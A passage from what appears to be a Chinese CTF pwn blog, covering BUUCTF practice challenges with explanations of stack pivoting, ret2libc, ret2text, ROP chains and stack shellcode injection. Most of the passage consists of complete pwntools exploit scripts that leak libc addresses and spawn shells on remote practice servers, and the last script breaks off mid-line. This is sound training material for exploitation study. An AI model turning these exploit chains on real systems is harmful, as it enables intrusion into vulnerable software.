class="string">&quot;Hello, %s\n&quot;</span>, s);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到<code>read</code>大小为0x30，但是s变量和ebp的距离是0x28。八字节的溢出只够覆盖<code>ebp</code>和<code>ret</code>，不可以做到直接修改<code>hack</code>函数里system的参数。<strong>所以我们利用<code>leave_ret</code>挟持esp进行栈迁移</strong></p>
<p>若无限制，构造的栈长这样：</p>
<table>
<thead>
<tr>
<th></th>
<th>&#x2F;bin&#x2F;sh</th>
</tr>
</thead>
<tbody><tr>
<td></td>
<td>&#x2F;bin&#x2F;sh_addr</td>
</tr>
<tr>
<td></td>
<td>0xdeadbeef</td>
</tr>
<tr>
<td><strong>return</strong></td>
<td>system_addr</td>
</tr>
<tr>
<td><strong>ebp</strong></td>
<td>aaaa</td>
</tr>
<tr>
<td><strong>s</strong></td>
<td>垃圾数据</td>
</tr>
<tr>
<td><strong>esp</strong></td>
<td></td>
</tr>
</tbody></table>
<p>但是有限制，所以通过<code>leave</code>转移到别处，因此将<code>ebp</code>的内容改为<code>s</code>的地址，<code>return</code>改为<code>leave</code>的地址</p>
<p>执行两次leave之后栈的样子</p>
<table>
<thead>
<tr>
<th>return</th>
<th>leave_ret_addr</th>
</tr>
</thead>
<tbody><tr>
<td><strong>ebp</strong></td>
<td>s_addr</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>esp</strong></td>
<td></td>
</tr>
<tr>
<td><strong>s</strong></td>
<td>垃圾数据</td>
</tr>
</tbody></table>
<p>一般leave命令后面都会跟着ret命令，也是必须要有的。此处如果继续执行ret命令就会返回到esp所指向内容填写的地址，那么接下来就很好办了，我们构造栈的内容</p>
<table>
<thead>
<tr>
<th><strong>return</strong></th>
<th>leave_ret_addr</th>
</tr>
</thead>
<tbody><tr>
<td><strong>ebp</strong></td>
<td>aaaa</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>&#x2F;bin&#x2F;sh</td>
</tr>
<tr>
<td></td>
<td>&#x2F;bin&#x2F;sh_addr</td>
</tr>
<tr>
<td></td>
<td>0xdeadbeef</td>
</tr>
<tr>
<td><strong>esp</strong></td>
<td>system_addr</td>
</tr>
<tr>
<td><strong>s</strong></td>
<td>垃圾数据</td>
</tr>
</tbody></table>
<p>当然此处我们还有一个问题就是’&#x2F;bin&#x2F;sh’的地址我们不知道。我们可以通过泄露原来ebp的值来确定，我们将此地址叫做addr，以免和ebp寄存器混淆</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">vul</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> s[<span class="number">40</span>]; <span class="comment">//	[esp+0h][ebp-28h]BYREF</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">memset</span>(s, <span class="number">0x20u</span>);</span><br><span class="line">    read(<span class="number">0</span>, s, <span class="number">0x30u</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Hello, %s\n&quot;</span>, s);</span><br><span class="line">    read(<span class="number">0</span>, s, <span class="number">0x30u</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">&quot;Hello, %s\n&quot;</span>, s);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到有一个printf函数</p>
<p>printf函数会打印s字符串，且遇到0就会停止打印，所以如果我们将addr之前的内容全部填充不为0的字符，就能将addr打印出来，我们通过地址再计算出addr到s的距离，我们就可以通过addr来表示<code>/bin/sh</code>所在的地址了。</p>
<p><strong>我们先通过第一个<code>read</code>传入<code>payload</code>，然后通过<code>printf</code>打印出<code>addr</code>的值,然后通过第二个<code>read</code>函数构造栈转移，执行<code>systeam(&#39;/bin/sh&#39;)</code></strong></p>
<h2 id="27-HarekazeCTF2019-baby-rop2"><a href="#27-HarekazeCTF2019-baby-rop2" class="headerlink" title="27 HarekazeCTF2019 baby_rop2"></a>27 HarekazeCTF2019 baby_rop2</h2><p>ret2libc，但是用<code>printf</code>输出<code>read</code>函数的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="comment">#p=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25118</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line">read_got=elf.got[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">printf_plt=elf.plt[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">main_addr=elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">format_addr=<span class="number">0x400770</span>	<span class="comment"># 原本输出字符串的地址</span></span><br><span class="line">pop_rdi = <span class="number">0x400733</span></span><br><span class="line">pop_rsi_r15 = <span class="number">0x400731</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x8</span>	<span class="comment"># 设置溢出覆盖返回地址</span></span><br><span class="line">payload+=p64(pop_rdi)+p64(format_addr)	<span class="comment"># pop_rdi弹入原本字符串</span></span><br><span class="line">payload+=p64(pop_rsi_r15)+p64(read_got)+p64(<span class="number">0</span>)</span><br><span class="line"><span class="comment"># ret到pop_rsi_r15，将read的got表地址弹入rsi，随便一个东西弹入r15</span></span><br><span class="line">payload+=p64(printf_plt)+p64(main_addr)</span><br><span class="line"><span class="comment"># ret到printf的plt表地址，也就是调用plt，然后返回main</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&quot;name?&quot;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;!\n&#x27;</span>)</span><br><span class="line">read_addr=u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc=LibcSearcher(<span class="string">&quot;read&quot;</span>,read_addr)</span><br><span class="line">libc_base=read_addr-libc.dump(<span class="string">&#x27;read&#x27;</span>)</span><br><span class="line">log.info(<span class="string">&quot;libc_base:&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">sys_addr=libc_base+libc.dump(<span class="string">&quot;system&quot;</span>)</span><br><span class="line">binsh_addr=libc_base+libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)</span><br><span class="line">payload2=<span class="string">b&#x27;a&#x27;</span>*<span class="number">40</span>+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)+p64(<span class="number">0</span>)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>这道题远程直接<code>cat flag</code>不能用，先<code>find -name &quot;flag&quot;</code>找到flag放在了<code>./home/babyrop2/flag</code>里，再<code>cat</code></p>
<h2 id="28-picoctf-2018-rop-chain"><a href="#28-picoctf-2018-rop-chain" class="headerlink" title="28 picoctf_2018_rop chain"></a>28 picoctf_2018_rop chain</h2><p>很简单的溢出、改数据，拿flag</p>
<p>注意里面这一句</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if (win1 &amp;&amp; win2 &amp;&amp; a1 == -559039827)</span><br></pre></td></tr></table></figure>

<p>是<code>win1和win2</code>,<code>a1和-559039827</code>,得到的结果再<code>&amp;&amp;</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26736</span>)</span><br><span class="line">win1_addr = <span class="number">0x80485CB</span></span><br><span class="line">win2_addr = <span class="number">0x80485D8</span></span><br><span class="line">flag = <span class="number">0x804862B</span></span><br><span class="line">pop_ebp = <span class="number">0x80485d6</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x18</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(win1_addr)+p32(win2_addr)+p32(flag)+p32(<span class="number">0xBAAAAAAD</span>)+p32</span><br><span class="line">(<span class="number">0xDEADBAAD</span>)</span><br><span class="line"><span class="comment"># 先返回到win1使得win1 = 1</span></span><br><span class="line"><span class="comment"># 然后返回win2，因为要与ebp+8比较，所以中间先加一个flag_addr</span></span><br><span class="line"><span class="comment"># 比较好了直接返回到flag_addr</span></span><br><span class="line"><span class="comment"># 然后与ebp+8进行比较，正好夹了一个0xBAAAAAAD</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="29-pwn2-sctf-2016"><a href="#29-pwn2-sctf-2016" class="headerlink" title="29 pwn2_sctf_2016"></a>29 pwn2_sctf_2016</h2><p>先输入一个负值就可以溢出了，跟正常<em><strong>libc</strong></em>没区别，<del>就是我的LibcSearcher没找到对应的libc，看网上师傅的博客有说选13，但是我的只显示到9</del></p>
<p><em>破案了，LibcSearcher会随机roll，看运气(有点过于艺术了)</em></p>
<p><em>roll了半个小时，靶机都过期了，算了，本地过了就行了，本地选5</em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;arm64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">r = remote(<span class="string">&quot;node5.buuoj.cn&quot;</span>,<span class="number">26858</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">printf_plt = elf.plt[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">start_addr = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">r.recvuntil(<span class="string">&#x27;read?&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;data!\n&quot;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * (<span class="number">0x2c</span>+<span class="number">4</span>) + p32(printf_plt) + p32(start_addr) + p32(printf_got)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">printf_addr=u32(r.recv(<span class="number">4</span>))</span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;printf&#x27;</span>,printf_addr)</span><br><span class="line"></span><br><span class="line">libc_base = printf_addr-libc.dump(<span class="string">&#x27;printf&#x27;</span>)</span><br><span class="line">system_addr = base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">bin_sh = base + libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&#x27;read?&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;data!\n&quot;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x2c</span>+<span class="number">4</span>)+p32(system_addr)+p32(start_addr)+p32(bin_sh)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="30-jarvisoj-level3"><a href="#30-jarvisoj-level3" class="headerlink" title="30 jarvisoj_level3"></a>30 jarvisoj_level3</h2><p><em><strong>ret2libc</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;i386&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc-2.19.so&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28662</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">main = elf.sym[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x88</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(write_plt)+p32(main)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">0x4</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Input:\n&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">write_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;write&#x27;</span>,write_addr)</span><br><span class="line">libc_base = write_addr-libc.dump(<span class="string">&#x27;write&#x27;</span>)</span><br><span class="line">log.info(<span class="string">&quot;libc_base:&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">sys = libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh = libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x88</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(sys)+p32(<span class="number">0</span>)+p32(binsh)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="31-ciscn-2019-s-3"><a href="#31-ciscn-2019-s-3" class="headerlink" title="31 ciscn_2019_s_3"></a>31 ciscn_2019_s_3</h2><p>施工中……</p>
<h2 id="32-wustctf2020-getshell"><a href="#32-wustctf2020-getshell" class="headerlink" title="32 wustctf2020_getshell"></a>32 wustctf2020_getshell</h2><p><em><strong>ret2text</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25069</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(<span class="number">0x8048524</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="33-ez-pz-hackover-2016-动态调试入门"><a href="#33-ez-pz-hackover-2016-动态调试入门" class="headerlink" title="33 ez_pz_hackover_2016 (动态调试入门)"></a>33 ez_pz_hackover_2016 (动态调试入门)</h2><p>一道很好的<em><strong>动态调试</strong></em>入门题</p>
<p>检查保护</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[*] &#x27;/home/pwn/pwn/buuctf/33/pwn&#x27;</span><br><span class="line">    Arch:       i386-32-little</span><br><span class="line">    RELRO:      Full RELRO</span><br><span class="line">    Stack:      No canary found</span><br><span class="line">    NX:         NX unknown - GNU_STACK missing</span><br><span class="line">    PIE:        No PIE (0x8048000)</span><br><span class="line">    Stack:      Executable</span><br><span class="line">    RWX:        Has RWX segments</span><br><span class="line">    Stripped:   No</span><br></pre></td></tr></table></figure>

<p>保护全关，有可读可写可执行段，可能是<code>shellcode</code></p>
<p>看下题目</p>
<p><img src="/./images/image-20250131225811634.png" alt="image-20250131225811634"></p>
<p><code>memchr</code>函数在网上搜索一下就好，这里不做详细介绍，主要是看到最后有一个比较，如果在<code>\n</code>之前为<code>crasheme</code>，则可以进入vuln函数</p>
<p><img src="/./images/image-20250131230108221.png" alt="image-20250131230108221"></p>
<p>明显的溢出漏洞，<code>dest</code>仅有0x32字节，但是可以读入0x400字节，往里面写入shellcode</p>
<p><strong>思路</strong></p>
<p>往s里写入shllcode，执行vuln函数后让dest溢出，将返回地址修改为shellcode的地址</p>
<p><strong>实施</strong></p>
<p>但是dest是栈上的数据，一般情况下我们是找不到我们写入的地址的，那就没办法执行shellcode的地址。</p>
<p>执行一次程序可以发现其实程序一开始就把我们输入的地址给我们了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;Yippie, lets crash: %p\n&quot;</span>, s);</span><br></pre></td></tr></table></figure>

<p>那么我们算出shellcode和我们输入的起始位置的偏移，就可以得到shellcode的地址</p>
<p>先写一个测试脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">p=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">&#x27;b *0x8048600&#x27;</span>)<span class="comment">#利用gdb动调，在0x8048600处下了个断点</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;crash: &#x27;</span>)</span><br><span class="line">stack=<span class="built_in">int</span>(p.recv(<span class="number">10</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span> (<span class="built_in">hex</span>(stack))</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;crashme\x00&#x27;</span>+<span class="string">&#x27;aaaaaa&#x27;</span><span class="comment">#前面的crashme\x00绕过if判断</span></span><br><span class="line">      <span class="comment">#后面的aaaa是测试数据，随便输入的，我们等等去栈上找它的地址</span></span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">p.sendline(payload)</span><br><span class="line">pause()</span><br></pre></td></tr></table></figure>

<p><code>0x8048600</code>是一个<code>nop</code>指令的地址，在这里下一个断点，方便调试</p>
<p><img src="/./images/image-20250131231137749.png" alt="image-20250131231137749"></p>
<p><em>这里输入地址的结尾是abc</em></p>
<p>按c执行下一步，然后输入<code>stack 50</code>看一下栈布局</p>
<p><img src="/./images/image-20250131233050407.png" alt="image-20250131233050407"></p>
<p><strong>解决一下shellcode在栈上的位置（填充多少数据合适）</strong></p>
<p>可以看到我们输入的crashme有一部分在距离<code>esp</code>0x24处，因为没有对齐的原因，cr在上面一行，对应0x63 0x72(小端序)</p>
<p>然后ebp在0x38处，我们输入的参数0x22处（虽然左边标的是0x20，但是有两个字节不是我们输入的，真正输入的是0x72 0x63)，所以ebp距离我们输入点的距离是<code>0x38-0x22=0x16</code>，而shellcode是写在ebp后面的，也就是<code>0x16+0x4</code>的地方</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">b&#x27;crashme\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x16</span>-<span class="number">8</span>+<span class="number">4</span>)+p32(addr)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>crashme\x00占8个字节减去，ebp占4个字节要覆盖</p>
</blockquote>
<p><strong>解决shllcode的地址问题</strong></p>
<p>上面已经将我们的输入地址打印出来了（结尾是<code>abc</code>，在ebp下面）</p>
<p>既然我们只有一次输入机会，那么我们构造完返回地址之后直接跟着shellcode好了，所以直接把地址返回到ebp+8的位置就行</p>
<p><code>0xfff9eabc-0xfff9eaa0=0x1c</code>，所以最终地址偏移为0x1c</p>
<p>最后得到exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;i386&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line"><span class="comment">#elf = ELF(&quot;./pwn&quot;)</span></span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26858</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;crash: &#x27;</span>)</span><br><span class="line">stack_addr=<span class="built_in">int</span>(p.recv(<span class="number">10</span>),<span class="number">16</span>)</span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;crashme\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x16</span>-<span class="number">8</span>+<span class="number">4</span>)+p32(stack_addr-<span class="number">0x1c</span>)+shellcode</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="34-jarvisoj-level3-x64"><a href="#34-jarvisoj-level3-x64" class="headerlink" title="34 jarvisoj_level3_x64"></a>34 jarvisoj_level3_x64</h2><p>64位的***<code>ret2libc</code>***从栈传参变成了寄存器传参</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28910</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">rdi_add = <span class="number">0x4006b3</span></span><br><span class="line">rsir15_add = <span class="number">0x4006b1</span></span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">vul_add = elf.symbols[<span class="string">&#x27;vulnerable_function&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x80</span> + <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x8</span></span><br><span class="line">payload1=payload+p64(rdi_add)+p64(<span class="number">0x1</span>)+p64(rsir15_add)+p64(write_got)+<span class="string">b&#x27;deadbeef&#x27;</span>+p64(write_plt)+p64(vul_add)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Input:\n&quot;</span>)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line">write_addr = u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span 